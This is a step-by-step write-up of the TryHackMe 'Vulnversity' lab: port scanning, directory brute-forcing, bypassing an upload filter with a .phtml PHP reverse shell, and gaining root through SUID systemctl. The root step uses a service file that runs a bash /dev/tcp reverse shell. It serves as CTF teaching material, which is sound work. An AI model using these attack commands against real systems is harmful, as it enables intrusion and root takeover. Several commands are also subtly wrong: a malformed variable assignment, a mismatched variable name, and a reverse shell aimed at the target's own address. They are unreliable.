tryhackme Vulnversity Writeup

tryhackme Vulnversity writeup


connect to the tryhackme servers using their vpn sudo apt install openvpn


download the vpn config file https://tryhackme.com/access


sudo openvpn [config file]


once connected ping your target machine which you spun up in Task 1. In my case it is 10.10.1.153


ping 10.10.1.153



Reconnaissance:
scan all ports on the target


nmap -p- 10.10.1.153


you see that there are 6 ports open


now run a version scan on that squid port


nmap -sV -p 3128 10.10.1.153


you see it is version Squid http proxy 3.5.12


nmap -p-400 10.10.1.153


400 ports are scanned


nmap -n nmap 10.10.1.153


-n does not resolve dns


nmap -A 10.10.1.153


the host is running Ubuntu


from before you know that the web server is Apache on port 3333



Directory Bruteforcing
https://github.com/OJ/gobuster
you will need the GoBuster tool to automate the directory enumeration/discovery process


sudo apt-get install gobuster


navigate to the installed wordlists folder


cd /usr/share/wordlists
ls
cd /dirbuster/


now you will use the small directory wordlist to enumerate through


you are targetting port 3333 for the apache webserver which may host exposed directories


gobuster dir -u http://10.10.1.153:3333 -w directory-list-2.3-small.txt


this may take a while because there are 87,665 words


eventually the tool will print out that the directory /internal was discovered


go to firefox and navigate to that directory: http://10.10.1.153:3333/internal/ 


you have found the upload form


you can stop the gobuster tool whenever you'd like



Compromising the webserver
try to upload a bunch of different files to the form and discover that .php is being explicity blocked


now you will fuzz the form(meaning you will upload a bunch of random data to try and discover some error or entry way


open a new terminal


burpsuite


open firefox and install foxyproxy -- configure it to redirect requests to the burp proxy


create a file on your desktop folder


touch shell.php


with the burp intercept on, try to upload that file


forward the requests until you see a POST request with a filename header value


right click anyway on the request and send it to Intruder


in the position lines, find 'filename="§shell.php§"' and change it to "shell§.php§"


This makes the file extension a variable that burp will manipulate with each new request based off what you then put into the payload


in this case, go to the payload tab and add a bunch of different extensions:


.php .php2 .php3 .php4 .phtml 


scroll down to "payload encoding" and uncheck URL-encode these characters.


start attack


by viewing the responses for each different extension request, you find that .phtml had a successful submission instead of the usual "extension not allowed"


you can turn the proxy off and close burpsuite


now that you know you can upload .phtml files, you want to payload a php reverse shell script and send it to be stored on the webserver where you will then cause the webserver to execute it


git clone https://github.com/pentestmonkey/php-reverse-shell.git


cd php-reverse-shell


ls


mv php-reverse-shell.php shell.phtml


sudo nano shell.phtml


scroll down the code using arrow keys and change "$ip" to your vpn host IP and "$port" to 3333


press "ctl o" to write out and hit enter to save file


press "ctl x" to exit nano and return to terminal


upload the shell.phtml file to the webserver and navigate to http://IP:3333/internal/uploads/


you will see the index of the directory and your shell.phtml will be listed as a child


open a new termainl to start netcat


nc -lvnp 3333


this will make your host machine listen for connections on port 3333


now go back to the uploads index and click on your shell.phtml, this will cause the webserver to open and therefore execute the php code which in turn causes an outbound connection to be made to your host machine over port 3333


look at the terminal that you started netcat in and you will see the connection was established and now you have a reverse shell open. Congrats.


whoami
ls
cat /etc/passwd


you see a list of users and one name pops out: bill


cd /home/bill
ls
cat user.txt


there is the user flag


Privilege Escalation
this finds files with setuid permission


find / -user root -perm -4000 -exec ls -ldb {} \;


"find /" checks all mounted paths starting at / which is the root directory


"-user root" displays all files owned by root


"-perm -4000" displays files with permissions set to 4000


"-exec ls -ldb" displays the out of the find command in ls -ldb format


you will notice that most of the files cannot be checked because you do not have the right permissions


one file does pop out, however, and that is /bin/systemctl which has the setuid permission


Now it is time to make a temporary service file and then enable it with /bin/systemctl


Because /bin/systemctl has setuid permissions, it will grant root privileges to the service


That service will then be able to access the root.txt file that is hidden in on the machine


keep in mind that we would have no idea that the root.txt file is there and it would take a more complex service to find it, however, to keep this simple, we already know about it


reference https://gtfobins.github.io/gtfobins/systemctl/


cd /tmp
ls


$(mktemp) randomizes the name


TF = $(mktemp).service


then we echo in txt into the file


the quotation means the start of what to write into file


this means you can press enter to go to the next line


echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/root.txt"
[Install]
WantedBy=multi-user.target' > $TF


the temp service file will is now ready


/bin/systemctl link $tempFile
/bin/systemctl enable --now $TF
ls


the root.txt file should now be in the /tmp directory


cat root.txt


and you have found the root flag


Here is the more complex answer where we run a reverse shell with root access


You will also simply make a service file without randomizing the name


cd /tmp
touch a.service
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/10.10.1.153/7777 0>&1"
[Install]
WantedBy=multi-user.target' > /tmp/a.service
/bin/systemctl link /tmp/a.service


open a new termainl for a netcat listener


nc -lvnp 7777


finally start the service


/bin/systemctl enable --now /tmp/a.service


in the nc terminal you will see that a connection was established and you are now root@vulniversity


cd /root/
ls
cat root.txt


you have now found the root flag



Further notes:


I want to breakdown the service file and its creation a little to explain it better


"touch a.service" created an empty file with the .service extension


"echo '" begins an echo command with the intitial quotation mark. That means everything after will be contained until the closing quotation mark appears. This means you can press enter to go to a new line without breaking the command.


"[Service]" at the top makes it so the file is recognized as a service


"Type=oneshot" means that it will only run once


"ExecStart=/bin/bash" is the main process of the service and in this case you are running bash.  "-c" is the command option and "bash -i >& /dev/tcp/10.10.1.153/7777 0>&1" is the command. This is telling the machine to open a reverse shell with 10.10.1.153 over port 7777.


"[Install] is necessary


"WantedBy=multi-user.target'" is so that the service is used by all users instead of just specifying one. The closing quotation mark there ends the echo command. " > /tmp/a.service" is how you pipe(or paste text) of the echo command to a file -- in this case the service file. This is the command-line way of writing to a file because there may not be a file editor installed on the target machine or you may not have permissions to use one.


Finally, you create a symbolic link between /bin/systemctl and /tmp/a.service so that systemctl can control(start, stop, restart) the service with root permission.